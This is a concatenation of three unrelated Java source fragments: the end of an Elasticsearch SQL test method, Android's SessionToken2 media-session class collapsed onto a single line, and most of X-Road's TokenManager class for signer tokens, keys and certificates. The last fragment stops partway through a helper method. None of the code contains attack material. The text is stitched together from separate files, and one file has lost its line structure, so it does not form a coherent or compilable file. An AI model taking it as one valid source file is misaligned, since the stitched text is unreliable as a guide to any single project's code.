            new TestResultRowSet<NamedWriteable>(List.of(randomHitExtractor(0)), new BitSet(), dataSize),
            Cursor.EMPTY
        );

        // Count listener callbacks so the tests can assert on success/failure.
        AtomicInteger responses = new AtomicInteger();
        AtomicInteger failures = new AtomicInteger();
        ActionListener<Cursor.Page> listener = new ActionListener<>() {
            @Override
            public void onResponse(Cursor.Page page) {
                responses.getAndIncrement();
            }

            @Override
            public void onFailure(Exception e) {
                failures.getAndIncrement();
            }
        };

        SqlSession session = new SqlSession(SqlTestUtils.TEST_CFG, null, null, null, null, null, null, null, null);
        Querier querier = new Querier(session);
        // Inner-class instantiation: the sorter is bound to this querier.
        Querier.LocalAggregationSorterListener localSorter = querier.new LocalAggregationSorterListener(listener, emptyList(), -1);

        localSorter.onResponse(page);
        return new Tuple<>(responses.get(), failures.get());
    }
}
/* * Copyright 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package androidx.media; import static androidx.annotation.RestrictTo.Scope.LIBRARY_GROUP; import android.content.ComponentName; import android.content.Context; import android.content.Intent; import android.content.pm.PackageManager; import android.content.pm.ResolveInfo; import android.media.session.MediaSessionManager; import android.os.Bundle; import android.support.v4.media.session.MediaSessionCompat; import android.text.TextUtils; import androidx.annotation.IntDef; import androidx.annotation.NonNull; import androidx.annotation.Nullable; import androidx.annotation.RestrictTo; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.util.List; /** * Represents an ongoing {@link MediaSession2}. * <p> * This may be passed to apps by the session owner to allow them to create a * {@link MediaController2} to communicate with the session. * <p> * It can be also obtained by {@link MediaSessionManager}. */ // New version of MediaSession.Token for following reasons // - Stop implementing Parcelable for updatable support // - Represent session and library service (formerly browser service) in one class. // Previously MediaSession.Token was for session and ComponentName was for service. 
public final class SessionToken2 { /** * @hide */ @RestrictTo(LIBRARY_GROUP) @Retention(RetentionPolicy.SOURCE) @IntDef(value = {TYPE_SESSION, TYPE_SESSION_SERVICE, TYPE_LIBRARY_SERVICE}) public @interface TokenType { } /** * Type for {@link MediaSession2}. */ public static final int TYPE_SESSION = 0; /** * @hide */ @RestrictTo(LIBRARY_GROUP) public static final int TYPE_SESSION_SERVICE = 1; /** * @hide */ @RestrictTo(LIBRARY_GROUP) public static final int TYPE_LIBRARY_SERVICE = 2; //private final SessionToken2Provider mProvider; // From the return value of android.os.Process.getUidForName(String) when error private static final int UID_UNKNOWN = -1; private static final String KEY_UID = "android.media.token.uid"; private static final String KEY_TYPE = "android.media.token.type"; private static final String KEY_PACKAGE_NAME = "android.media.token.package_name"; private static final String KEY_SERVICE_NAME = "android.media.token.service_name"; private static final String KEY_ID = "android.media.token.id"; private static final String KEY_SESSION_TOKEN = "android.media.token.session_token"; private final int mUid; private final @TokenType int mType; private final String mPackageName; private final String mServiceName; private final String mId; private final MediaSessionCompat.Token mSessionCompatToken; private final ComponentName mComponentName; /** * @hide * Constructor for the token. You can only create token for session service or library service * to use by {@link MediaController2} or {@link MediaBrowser2}. * * @param context The context. * @param serviceComponent The component name of the media browser service. */ @RestrictTo(LIBRARY_GROUP) public SessionToken2(@NonNull Context context, @NonNull ComponentName serviceComponent) { this(context, serviceComponent, UID_UNKNOWN); } /** * Constructor for the token. You can only create token for session service or library service * to use by {@link MediaController2} or {@link MediaBrowser2}. 
* * @param context The context. * @param serviceComponent The component name of the media browser service. * @param uid uid of the app. * @hide */ @RestrictTo(LIBRARY_GROUP) public SessionToken2(@NonNull Context context, @NonNull ComponentName serviceComponent, int uid) { if (serviceComponent == null) { throw new IllegalArgumentException("serviceComponent shouldn't be null"); } mComponentName = serviceComponent; mPackageName = serviceComponent.getPackageName(); mServiceName = serviceComponent.getClassName(); // Calculate uid if it's not specified. final PackageManager manager = context.getPackageManager(); if (uid < 0) { try { uid = manager.getApplicationInfo(mPackageName, 0).uid; } catch (PackageManager.NameNotFoundException e) { throw new IllegalArgumentException("Cannot find package " + mPackageName); } } mUid = uid; // Infer id and type from package name and service name String id = getSessionIdFromService(manager, MediaLibraryService2.SERVICE_INTERFACE, serviceComponent); if (id != null) { mId = id; mType = TYPE_LIBRARY_SERVICE; } else { // retry with session service mId = getSessionIdFromService(manager, MediaSessionService2.SERVICE_INTERFACE, serviceComponent); mType = TYPE_SESSION_SERVICE; } if (mId == null) { throw new IllegalArgumentException("service " + mServiceName + " doesn't implement" + " session service nor library service. Use service's full name."); } mSessionCompatToken = null; } /** * @hide */ @RestrictTo(LIBRARY_GROUP) SessionToken2(int uid, int type, String packageName, String serviceName, String id, MediaSessionCompat.Token sessionCompatToken) { mUid = uid; mType = type; mPackageName = packageName; mServiceName = serviceName; mComponentName = (mType == TYPE_SESSION) ? 
null : new ComponentName(packageName, serviceName); mId = id; mSessionCompatToken = sessionCompatToken; } @Override public int hashCode() { final int prime = 31; return mType + prime * (mUid + prime * (mPackageName.hashCode() + prime * (mId.hashCode() + prime * (mServiceName != null ? mServiceName.hashCode() : 0)))); } @Override public boolean equals(Object obj) { if (!(obj instanceof SessionToken2)) { return false; } SessionToken2 other = (SessionToken2) obj; return mUid == other.mUid && TextUtils.equals(mPackageName, other.mPackageName) && TextUtils.equals(mServiceName, other.mServiceName) && TextUtils.equals(mId, other.mId) && mType == other.mType; } @Override public String toString() { return "SessionToken {pkg=" + mPackageName + " id=" + mId + " type=" + mType + " service=" + mServiceName + " sessionCompatToken=" + mSessionCompatToken + "}"; } /** * @return uid of the session */ public int getUid() { return mUid; } /** * @return package name */ public @NonNull String getPackageName() { return mPackageName; } /** * @return service name. Can be {@code null} for TYPE_SESSION. */ public @Nullable String getServiceName() { return mServiceName; } /** * @hide * @return component name of this session token. Can be null for TYPE_SESSION. */ @RestrictTo(LIBRARY_GROUP) public ComponentName getComponentName() { return mComponentName; } /** * @return id */ public String getId() { return mId; } /** * @return type of the token * @see #TYPE_SESSION */ public @TokenType int getType() { return mType; } /** * Create a token from the bundle, exported by {@link #toBundle()}. 
* * @param bundle * @return */ public static SessionToken2 fromBundle(@NonNull Bundle bundle) { if (bundle == null) { return null; } final int uid = bundle.getInt(KEY_UID); final @TokenType int type = bundle.getInt(KEY_TYPE, -1); final String packageName = bundle.getString(KEY_PACKAGE_NAME); final String serviceName = bundle.getString(KEY_SERVICE_NAME); final String id = bundle.getString(KEY_ID); final MediaSessionCompat.Token token = bundle.getParcelable(KEY_SESSION_TOKEN); // Sanity check. switch (type) { case TYPE_SESSION: if (token == null) { throw new IllegalArgumentException("Unexpected token for session," + " SessionCompat.Token=" + token); } break; case TYPE_SESSION_SERVICE: case TYPE_LIBRARY_SERVICE: if (TextUtils.isEmpty(serviceName)) { throw new IllegalArgumentException("Session service needs service name"); } break; default: throw new IllegalArgumentException("Invalid type"); } if (TextUtils.isEmpty(packageName) || id == null) { throw new IllegalArgumentException("Package name nor ID cannot be null."); } return new SessionToken2(uid, type, packageName, serviceName, id, token); } /** * Create a {@link Bundle} from this token to share it across processes. 
* @return Bundle */ public Bundle toBundle() { Bundle bundle = new Bundle(); bundle.putInt(KEY_UID, mUid); bundle.putString(KEY_PACKAGE_NAME, mPackageName); bundle.putString(KEY_SERVICE_NAME, mServiceName); bundle.putString(KEY_ID, mId); bundle.putInt(KEY_TYPE, mType); bundle.putParcelable(KEY_SESSION_TOKEN, mSessionCompatToken); return bundle; } /** * @hide */ @RestrictTo(LIBRARY_GROUP) public static String getSessionId(ResolveInfo resolveInfo) { if (resolveInfo == null || resolveInfo.serviceInfo == null) { return null; } else if (resolveInfo.serviceInfo.metaData == null) { return ""; } else { return resolveInfo.serviceInfo.metaData.getString( MediaSessionService2.SERVICE_META_DATA, ""); } } MediaSessionCompat.Token getSessionCompatToken() { return mSessionCompatToken; } private static String getSessionIdFromService(PackageManager manager, String serviceInterface, ComponentName serviceComponent) { Intent serviceIntent = new Intent(serviceInterface); // Use queryIntentServices to find services with MediaLibraryService2.SERVICE_INTERFACE. // We cannot use resolveService with intent specified class name, because resolveService // ignores actions if Intent.setClassName() is specified. serviceIntent.setPackage(serviceComponent.getPackageName()); List<ResolveInfo> list = manager.queryIntentServices( serviceIntent, PackageManager.GET_META_DATA); if (list != null) { for (int i = 0; i < list.size(); i++) { ResolveInfo resolveInfo = list.get(i); if (resolveInfo == null || resolveInfo.serviceInfo == null) { continue; } if (TextUtils.equals( resolveInfo.serviceInfo.name, serviceComponent.getClassName())) { return getSessionId(resolveInfo); } } } return null; } }
/**
 * The MIT License
 * Copyright (c) 2015 Estonian Information System Authority (RIA), Population Register Centre (VRK)
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */
package ee.ria.xroad.signer.tokenmanager;

import ee.ria.xroad.common.CodedException;
import ee.ria.xroad.common.identifier.ClientId;
import ee.ria.xroad.signer.model.Cert;
import ee.ria.xroad.signer.model.CertRequest;
import ee.ria.xroad.signer.model.Key;
import ee.ria.xroad.signer.model.Token;
import ee.ria.xroad.signer.protocol.dto.CertRequestInfo;
import ee.ria.xroad.signer.protocol.dto.CertificateInfo;
import ee.ria.xroad.signer.protocol.dto.KeyInfo;
import ee.ria.xroad.signer.protocol.dto.KeyUsageInfo;
import ee.ria.xroad.signer.protocol.dto.TokenInfo;
import ee.ria.xroad.signer.protocol.dto.TokenStatusInfo;
import ee.ria.xroad.signer.tokenmanager.merge.MergeOntoFileTokensStrategy;
import ee.ria.xroad.signer.tokenmanager.merge.TokenMergeAddedCertificatesListener;
import ee.ria.xroad.signer.tokenmanager.merge.TokenMergeStrategy;
import ee.ria.xroad.signer.tokenmanager.merge.TokenMergeStrategy.MergeResult;
import ee.ria.xroad.signer.tokenmanager.module.SoftwareModuleType;
import ee.ria.xroad.signer.tokenmanager.token.TokenType;
import ee.ria.xroad.signer.util.SignerUtil;
import ee.ria.xroad.signer.util.TokenAndKey;

import lombok.extern.slf4j.Slf4j;

import org.bouncycastle.cert.ocsp.OCSPResp;

import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.function.BiFunction;
import java.util.function.Function;
import java.util.stream.Collectors;

import static ee.ria.xroad.common.ErrorCodes.X_WRONG_CERT_USAGE;
import static ee.ria.xroad.signer.util.ExceptionHelper.certWithIdNotFound;
import static ee.ria.xroad.signer.util.ExceptionHelper.keyNotFound;
import static ee.ria.xroad.signer.util.ExceptionHelper.tokenNotFound;
import static java.util.Collections.unmodifiableList;

/**
 * Manages the current state of tokens, their keys and certificates.
 */
@Slf4j
public final class TokenManager {

    // Replaced wholesale by init() and merge(); volatile so readers always see
    // the latest list. Most accessors additionally synchronize on TokenManager.class
    // (static synchronized methods).
    private static volatile List<Token> currentTokens = new ArrayList<>();

    // Set by init(); saveToConf() is a no-op until then.
    private static boolean initialized;

    // configure the implementation somewhere else if multiple implementations created
    private static TokenMergeStrategy mergeStrategy = new MergeOntoFileTokensStrategy();

    private TokenManager() {
    }

    /**
     * Initializes the manager -- loads the tokens from the token configuration.
     * A load failure is logged, not rethrown: the manager then starts with
     * whatever tokens TokenConf currently holds.
     *
     * @throws Exception if an error occurs
     */
    public static void init() throws Exception {
        try {
            TokenConf.getInstance().load();
        } catch (Exception e) {
            log.error("Failed to load token conf", e);
        }

        currentTokens = new ArrayList<>(TokenConf.getInstance().getTokens());

        initialized = true;
    }

    /**
     * Saves the current tokens to the configuration.
     *
     * @throws Exception if an error occurs
     */
    public static synchronized void saveToConf() throws Exception {
        log.trace("persist()");

        if (initialized) {
            TokenConf.getInstance().save(currentTokens);
        }
    }

    /**
     * Merge the in-memory configuration and the on-disk configuration if the configuration on
     * disk has changed. The swap of currentTokens happens under the class lock; reading the
     * new configuration from disk does not.
     *
     * @param listener notified with the certificates added by the merge; may be null
     */
    public static void merge(TokenMergeAddedCertificatesListener listener) {
        if (TokenConf.getInstance().hasChanged()) {
            log.debug("The key configuration on disk has changed, merging changes.");
            List<Token> fileTokens;
            try {
                fileTokens = TokenConf.getInstance().retrieveTokensFromConf();
            } catch (TokenConf.TokenConfException e) {
                // Keep the in-memory state untouched if the on-disk conf is unreadable.
                log.error("Failed to load the new key configuration from disk.", e);
                return;
            }

            MergeResult result;
            synchronized (TokenManager.class) {
                result = mergeStrategy.merge(fileTokens, currentTokens);
                currentTokens = result.getResultTokens();
            }
            if (listener != null) {
                listener.mergeDone(result.getAddedCertificates());
            }
            log.info("Merged new key configuration.");
        } else {
            log.debug("The key configuration on disk has not changed, skipping merge.");
        }
    }

    // ------------------------------------------------------------------------

    /**
     * @return list of tokens
     */
    public static synchronized List<TokenInfo> listTokens() {
        return unmodifiableList(currentTokens.stream()
                .map(t -> t.toDTO())
                .collect(Collectors.toList()));
    }

    /**
     * @param tokenId the token id
     * @return list of keys for a token
     */
    public static List<KeyInfo> listKeys(String tokenId) {
        return unmodifiableList(findTokenInfo(tokenId).getKeyInfo());
    }

    /**
     * Creates a new token with specified type.
     *
     * @param tokenType the type
     * @return the new token
     */
    public static synchronized TokenInfo createToken(TokenType tokenType) {
        Token token = new Token(tokenType.getModuleType(), tokenType.getId(),
                tokenType.getSignMechanismName());
        token.setModuleId(tokenType.getModuleType());
        token.setReadOnly(tokenType.isReadOnly());
        token.setSerialNumber(tokenType.getSerialNumber());
        token.setLabel(tokenType.getLabel());
        token.setSlotIndex(tokenType.getSlotIndex());
        token.setFriendlyName(getDefaultFriendlyName(tokenType));
        token.setBatchSigningEnabled(tokenType.isBatchSigningEnabled());
        token.setAvailable(true);

        currentTokens.add(token);

        return token.toDTO();
    }

    /**
     * @param tokenId the token id
     * @return the token info DTO for the token id or
     * throws exception if not found
     */
    public static TokenInfo findTokenInfo(String tokenId) {
        TokenInfo tokenInfo = getTokenInfo(tokenId);

        if (tokenInfo != null) {
            return tokenInfo;
        }

        throw tokenNotFound(tokenId);
    }

    /**
     * @param tokenId the token id
     * @return the token info DTO for the token id or null of not found
     */
    public static synchronized TokenInfo getTokenInfo(String tokenId) {
        log.trace("getTokenInfo({})", tokenId);

        return currentTokens.stream()
                .filter(t -> t.getId().equals(tokenId))
                .map(t -> t.toDTO())
                .findFirst().orElse(null);
    }

    /**
     * @param keyId the key id
     * @return the token and key or throws exception if not found
     */
    public static synchronized TokenAndKey findTokenAndKey(String keyId) {
        log.trace("findTokenAndKey({})", keyId);

        return forKey((t, k) -> k.getId().equals(keyId),
                (t, k) -> new TokenAndKey(t.getId(), k.toDTO()))
                .orElseThrow(() -> keyNotFound(keyId));
    }

    /**
     * @param keyId the key id
     * @return the token id for the key id or throws exception if not found
     */
    public static synchronized String findTokenIdForKeyId(String keyId) {
        log.trace("findTokenIdForKeyId({})", keyId);

        return forKey((t, k) -> k.getId().equals(keyId),
                (t, k) -> t.getId()).orElseThrow(() -> keyNotFound(keyId));
    }

    /**
     * @return the software token id
     */
    public static synchronized String getSoftwareTokenId() {
        return forToken(t -> t.getType().equals(SoftwareModuleType.TYPE),
                t -> t.getId()).orElse(null);
    }

    /**
     * @param tokenId the token id
     * @return the module id for the token id or null if not found
     */
    public static synchronized String getModuleId(String tokenId) {
        return forToken(t -> t.getId().equals(tokenId),
                t -> t.getModuleId()).orElse(null);
    }

    /**
     * @param keyId the key id
     * @return the key info for the key id or throws exception if not found
     */
    public static KeyInfo findKeyInfo(String keyId) {
        KeyInfo keyInfo = getKeyInfo(keyId);

        if (keyInfo != null) {
            return keyInfo;
        }

        throw keyNotFound(keyId);
    }

    /**
     * @param keyId the key id
     * @return the key info for the key id or null if not found
     */
    public static synchronized KeyInfo getKeyInfo(String keyId) {
        log.trace("getKeyInfo({})", keyId);

        return forKey((t, k) -> k.getId().equals(keyId),
                (t, k) -> k.toDTO()).orElse(null);
    }

    /**
     * Collects signing keys usable for the given client: only active, available
     * tokens; only available non-authentication keys; only active certificates
     * with a member id.
     *
     * @param clientId the client id
     * @return the list of keys for the given client id
     */
    public static synchronized List<KeyInfo> getKeyInfo(ClientId clientId) {
        log.trace("getKeyInfo({})", clientId);

        List<KeyInfo> keyInfo = new ArrayList<>();

        for (Token token : currentTokens) {
            if (!token.isActive() || !token.isAvailable()) {
                // Ignore inactive (not usable) tokens
                continue;
            }

            for (Key key : token.getKeys()) {
                if (!key.isAvailable() || key.getUsage() == KeyUsageInfo.AUTHENTICATION) {
                    // Ignore authentication keys
                    continue;
                }

                for (Cert cert : key.getCerts()) {
                    if (!cert.isActive() || cert.getMemberId() == null) {
                        // Ignore inactive and invalid certificates
                        continue;
                    }

                    if (certBelongsToMember(cert.toDTO(), clientId)) {
                        log.debug("Found key '{}' for client '{}'",
                                key.getId(), cert.getMemberId());
                        keyInfo.add(key.toDTO());
                    }
                }
            }
        }

        return keyInfo;
    }

    /**
     * @param certId the certificate id
     * @return the certificate info for the certificate id or
     * throws exception if not found
     */
    public static CertificateInfo findCertificateInfo(String certId) {
        CertificateInfo certificateInfo = getCertificateInfo(certId);

        if (certificateInfo != null) {
            return certificateInfo;
        }

        throw certWithIdNotFound(certId);
    }

    /**
     * @param certId the certificate id
     * @return the certificate info for the certificate id or null if not found
     */
    public static synchronized CertificateInfo getCertificateInfo(String certId) {
        log.trace("getCertificateInfo({})", certId);

        return forCert((k, c) -> c.getId().equals(certId), (k, c) -> c.toDTO())
                .orElse(null);
    }

    /**
     * @param certHash the certificate hash
     * @return the certificate info for the certificate hash or null
     */
    public static synchronized CertificateInfo getCertificateInfoForCertHash(String certHash) {
        log.trace("getCertificateInfoForCertHash({})", certHash);

        return forCert((k, c) -> certHash.equals(c.getHash()),
                (k, c) -> c.toDTO()).orElse(null);
    }

    /**
     * @param certHash the certificate hash
     * @return the certificate for the certificate hash or null
     */
    public static synchronized X509Certificate getCertificateForCertHash(String certHash) {
        log.trace("getCertificateForCertHash({})", certHash);

        return forCert((k, c) -> certHash.equals(c.getHash()),
                (k, c) -> c.getCertificate()).orElse(null);
    }

    /**
     * @return all certificates
     */
    public static synchronized List<CertificateInfo> getAllCerts() {
        log.trace("getAllCerts()");

        return currentTokens.stream()
                .flatMap(t -> t.getKeys().stream())
                .flatMap(k -> k.getCerts().stream())
                .map(c -> c.toDTO())
                .collect(Collectors.toList());
    }

    /**
     * Sets the OCSP response for the certificate. Silently does nothing when no
     * certificate matches the hash.
     *
     * @param certHash the certificate hash
     * @param response the OCSP response
     */
    public static synchronized void setOcspResponse(String certHash, OCSPResp response) {
        log.trace("setOcspResponse({})", certHash);

        forCert((k, c) -> certHash.equals(c.getHash()),
                (k, c) -> {
                    c.setOcspResponse(response);
                    return null;
                });
    }

    /**
     * @param keyId the key id
     * @param memberId the member id
     * @return the certificate request info or null if not found
     */
    public static synchronized CertRequestInfo getCertRequestInfo(String keyId, ClientId memberId) {
        log.trace("getCertRequestInfo({}, {})", keyId, memberId);

        Key key = findKey(keyId);

        // For authentication keys any request matches; otherwise match by member id.
        return key.getCertRequests().stream()
                .filter(c -> key.getUsage() == KeyUsageInfo.AUTHENTICATION
                        || memberId.equals(c.getMemberId()))
                .map(c -> c.toDTO()).findFirst().orElse(null);
    }

    /**
     * @param certHash the certificate hash
     * @return key info for the certificate hash
     */
    public static synchronized KeyInfo getKeyInfoForCertHash(String certHash) {
        log.trace("getKeyInfoForCertHash({})", certHash);

        return forCert((k, c) -> certHash.equals(c.getHash()),
                (k, c) -> k.toDTO()).orElse(null);
    }

    /**
     * @param certId the certificate id
     * @return key info for certificate id
     */
    public static synchronized KeyInfo getKeyInfoForCertId(String certId) {
        log.trace("getKeyInfoForCertId({})", certId);

        return forCert((k, c) -> c.getId().equals(certId),
                (k, c) -> k.toDTO()).orElse(null);
    }

    /**
     * @param certInfo the certificate info
     * @param member the member id
     * @return true if the cert belongs to the member
     */
    public static boolean certBelongsToMember(CertificateInfo certInfo, ClientId member) {
        return member.equals(certInfo.getMemberId())
                || member.subsystemContainsMember(certInfo.getMemberId());
    }

    /**
     * @param tokenId the token id
     * @return true if token is available
     */
    public static synchronized boolean isTokenAvailable(String tokenId) {
        log.trace("isTokenAvailable({})", tokenId);

        return findToken(tokenId).isAvailable();
    }

    /**
     * @param tokenId the token id
     * @return true if token is active (logged in)
     */
    public static synchronized boolean isTokenActive(String tokenId) {
        log.trace("isTokenActive({})", tokenId);

        return findToken(tokenId).isActive();
    }

    /**
     * Sets the token available. Also refreshes the token's module id from the type.
     *
     * @param tokenType the token type
     * @param available availability flag
     */
    public static synchronized void setTokenAvailable(TokenType tokenType, boolean available) {
        String tokenId = tokenType.getId();

        log.trace("setTokenAvailable({}, {})", tokenId, available);

        Token token = findToken(tokenId);
        token.setAvailable(available);
        token.setModuleId(tokenType.getModuleType());
    }

    /**
     * Sets the token available.
     *
     * @param tokenId the token id
     * @param available availability flag
     */
    public static synchronized void setTokenAvailable(String tokenId, boolean available) {
        log.trace("setTokenAvailable({}, {})", tokenId, available);

        findToken(tokenId).setAvailable(available);
    }

    /**
     * Sets the token active (logged in) or not
     *
     * @param tokenId the token id
     * @param active active flag
     */
    public static synchronized void setTokenActive(String tokenId, boolean active) {
        log.trace("setTokenActive({}, {})", tokenId, active);

        findToken(tokenId).setActive(active);
    }

    /**
     * Sets the token friendly name.
     *
     * @param tokenId token id
     * @param friendlyName the friendly name
     */
    public static synchronized void setTokenFriendlyName(String tokenId, String friendlyName) {
        log.trace("setTokenFriendlyName({}, {})", tokenId, friendlyName);

        findToken(tokenId).setFriendlyName(friendlyName);
    }

    /**
     * @param tokenId the token if
     * @return the token status info
     */
    public static synchronized TokenStatusInfo getTokenStatus(String tokenId) {
        log.trace("getTokenStatus({})", tokenId);

        return findToken(tokenId).getStatus();
    }

    /**
     * Sets the token status info
     *
     * @param tokenId the token id
     * @param status the status
     */
    public static synchronized void setTokenStatus(String tokenId, TokenStatusInfo status) {
        log.trace("setTokenStatus({}, {})", tokenId, status);

        findToken(tokenId).setStatus(status);
    }

    /**
     * Sets the key availability.
     *
     * @param keyId the key id
     * @param available true if available
     */
    public static synchronized void setKeyAvailable(String keyId, boolean available) {
        log.trace("setKeyAvailable({}, {})", keyId, available);

        findKey(keyId).setAvailable(available);
    }

    /**
     * @param keyId the key id
     * @return true if key is available
     */
    public static synchronized boolean isKeyAvailable(String keyId) {
        log.trace("isKeyAvailable()");

        return findKey(keyId).isAvailable();
    }

    /**
     * Sets the key friendly name.
     *
     * @param keyId the key id
     * @param friendlyName the friendly name
     */
    public static synchronized void setKeyFriendlyName(String keyId, String friendlyName) {
        log.trace("setKeyFriendlyName({}, {})", keyId, friendlyName);

        findKey(keyId).setFriendlyName(friendlyName);
    }

    /**
     * Sets the key label.
     *
     * @param keyId the key id
     * @param label the label
     */
    public static synchronized void setKeyLabel(String keyId, String label) {
        log.trace("setKeyLabel({}, {})", keyId, label);

        findKey(keyId).setLabel(label);
    }

    /**
     * Sets the key usage.
     *
     * @param keyId the key id
     * @param keyUsage the key usage
     */
    public static synchronized void setKeyUsage(String keyId, KeyUsageInfo keyUsage) {
        log.trace("setKeyUsage({}, {})", keyId, keyUsage);

        findKey(keyId).setUsage(keyUsage);
    }

    /**
     * Adds a key with id and base64 public key to a token.
     *
     * @param tokenId the token id
     * @param keyId the key if
     * @param publicKeyBase64 the public key base64
     * @return the key info or throws exception if the token cannot be found
     */
    public static synchronized KeyInfo addKey(String tokenId, String keyId,
            String publicKeyBase64) {
        log.trace("addKey({}, {})", tokenId, keyId);

        Token token = findToken(tokenId);

        Key key = new Key(token, keyId);
        key.setPublicKey(publicKeyBase64);

        token.addKey(key);

        return key.toDTO();
    }

    /**
     * Removes a key with key id.
     *
     * @param keyId the key id
     * @return true if key was removed
     */
    public static synchronized boolean removeKey(String keyId) {
        log.trace("removeKey({})", keyId);

        return forKey((t, k) -> k.getId().equals(keyId),
                (t, k) -> t.getKeys().remove(k)).orElse(false);
    }

    /**
     * Sets the public key for a key.
     *
     * @param keyId the key id
     * @param publicKeyBase64 the public key base64
     */
    public static synchronized void setPublicKey(String keyId, String publicKeyBase64) {
        log.trace("setPublicKey({}, {})", keyId, publicKeyBase64);

        findKey(keyId).setPublicKey(publicKeyBase64);
    }

    /**
     * Adds a certificate to a key. Throws exception, if key cannot be found.
     * The new certificate gets a freshly generated random id.
     *
     * @param keyId the key id
     * @param certBytes the certificate bytes
     */
    public static synchronized void addCert(String keyId, byte[] certBytes) {
        log.trace("addCert({})", keyId);

        Key key = findKey(keyId);

        Cert cert = new Cert(SignerUtil.randomId());
        cert.setCertificate(certBytes);

        key.addCert(cert);
    }

    /**
     * Adds a certificate to a key. Throws exception, if key cannot be found.
     * All fields are copied over from the given certificate info.
     *
     * @param keyId the key id
     * @param certInfo the certificate info
     */
    public static synchronized void addCert(String keyId, CertificateInfo certInfo) {
        log.trace("addCert({})", keyId);

        Key key = findKey(keyId);

        Cert cert = new Cert(certInfo.getId());
        cert.setActive(certInfo.isActive());
        cert.setCertificate(certInfo.getCertificateBytes());
        cert.setOcspResponse(certInfo.getOcspBytes());
        cert.setMemberId(certInfo.getMemberId());
        cert.setSavedToConfiguration(certInfo.isSavedToConfiguration());
        cert.setStatus(certInfo.getStatus());

        key.addCert(cert);
    }

    /**
     * Sets the certificate active status.
     *
     * @param certId the certificate id
     * @param active true if active
     */
    public static synchronized void setCertActive(String certId, boolean active) {
        log.trace("setCertActive({}, {})", certId, active);

        findCert(certId).setActive(active);
    }

    /**
     * Sets the certificate status.
     *
     * @param certId the certificate id
     * @param status the status
     */
    public static synchronized void setCertStatus(String certId, String status) {
        log.trace("setCertStatus({}, {})", certId, status);

        findCert(certId).setStatus(status);
    }

    /**
     * Removes certificate with given id.
     *
     * @param certId the certificate id
     * @return true if certificate was removed
     */
    public static synchronized boolean removeCert(String certId) {
        log.trace("removeCert({})", certId);

        return forCert((k, c) -> c.getId().equals(certId),
                (k, c) -> k.getCerts().remove(c)).orElse(false);
    }

    /**
     * Adds a new certificate request to a key. If an equivalent request already
     * exists (same member and subject), its id is returned instead of creating
     * a duplicate.
     *
     * @param keyId the key id
     * @param memberId the member id
     * @param subjectName the sbject name
     * @param keyUsage the key usage
     * @return certificate id
     */
    public static synchronized String addCertRequest(String keyId, ClientId memberId,
            String subjectName, KeyUsageInfo keyUsage) {
        log.trace("addCertRequest({}, {})", keyId, memberId);

        Key key = findKey(keyId);

        // A key's usage is fixed by its first request; mixing usages is an error.
        if (key.getUsage() != null && key.getUsage() != keyUsage) {
            throw CodedException.tr(X_WRONG_CERT_USAGE,
                    "cert_request_wrong_usage",
                    "Cannot add %s certificate request to %s key", keyUsage,
                    key.getUsage());
        }

        key.setUsage(keyUsage);

        for (CertRequest certRequest : key.getCertRequests()) {
            ClientId crMember = certRequest.getMemberId();
            String crSubject = certRequest.getSubjectName();

            if ((memberId == null && crSubject.equalsIgnoreCase(subjectName))
                    || (memberId != null && memberId.equals(crMember)
                            && crSubject.equalsIgnoreCase(subjectName))) {
                log.warn("Certificate request (memberId: {}, "
                        + "subjectName: {}) already exists", memberId, subjectName);
                return certRequest.getId();
            }
        }

        String certId = SignerUtil.randomId();
        key.addCertRequest(new CertRequest(certId, memberId, subjectName));

        log.info("Added new certificate request (memberId: {}, "
                + "subjectId: {}) under key {}",
                new Object[] {memberId, subjectName, keyId});

        return certId;
    }

    /**
     * Removes a certificate request with given id.
     *
     * @param certReqId the certificate request id
     * @return key id from which the certificate request was removed
     */
    public static synchronized String removeCertRequest(String certReqId) {
        log.trace("removeCertRequest({})", certReqId);

        return forCertRequest((k, c) -> c.getId().equals(certReqId),
                (k, c) -> {
                    if (k.getUsage() == KeyUsageInfo.AUTHENTICATION) {
                        // Authentication keys can only have one certificate request
                        k.getCertRequests().clear();
                    } else {
                        if (!k.getCertRequests().remove(c)) {
                            return null;
                        }
                    }
                    return k.getId();
                }).orElse(null);
    }

    /**
     * Sets the token info for the token.
     *
     * @param tokenId the token id
     * @param info the token info
     */
    public static synchronized void setTokenInfo(String tokenId, Map<String, String> info) {
        findToken(tokenId).setInfo(info);
    }

    /**
     * @param tokenId the token id
     * @return true if batch signing is enabled for a token
     */
    public static synchronized boolean isBatchSigningEnabled(String tokenId) {
        log.trace("isBatchSigningEnabled({})", tokenId);

        return findToken(tokenId).isBatchSigningEnabled();
    }

    // ------------------------------------------------------------------------

    // Returns the mapper's result for the first token the tester accepts.
    private static <T> Optional<T> forToken(Function<Token, Boolean> tester,
            Function<Token, T> mapper) {
        for (Token token : currentTokens) {
            if (tester.apply(token)) {
                return Optional.ofNullable(mapper.apply(token));
            }
        }

        return Optional.empty();
    }

    // Returns the mapper's result for the first (token, key) pair the tester accepts.
    private static <T> Optional<T> forKey(
